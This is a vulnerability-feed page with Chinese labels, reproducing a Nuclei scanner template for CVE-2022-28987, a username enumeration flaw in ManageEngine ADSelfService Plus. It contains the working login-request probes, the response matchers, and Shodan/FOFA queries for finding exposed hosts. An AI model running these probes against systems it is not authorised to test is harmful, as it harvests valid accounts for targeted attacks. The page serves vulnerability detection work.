CVE-2022-28987: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.

PoC代码[已公开]

id: CVE-2022-28987

info:
  name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
  author: ritikchaddha
  severity: medium
  description: |
    Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
  impact: |
    Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
  remediation: |
    Update to version 6202 or later.
  reference:
    - https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28987
    epss-score: 0.166
    epss-percentile: 0.9477
    cwe-id: CWE-203
  metadata:
    max-request: 2
    verified: false
    shodan-query: http.title:"ADSelfService Plus"
    fofa-query: title="ADSelfService Plus"
  tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice

http:
  - raw:
      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=asdfnonexistent

      - |
        POST /ServletAPI/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginName=Guest

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Permission Denied")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains(body, "eSTATUS\":\"Your account has been disabled")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022033f71a664930288497e65062e4195548662e99891b6b860b3afda94f26033517022100db4f66ca5169358ff2a8c40748e4fd48522d87fc08d2cc42d9a5862a52a85398:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28987.yaml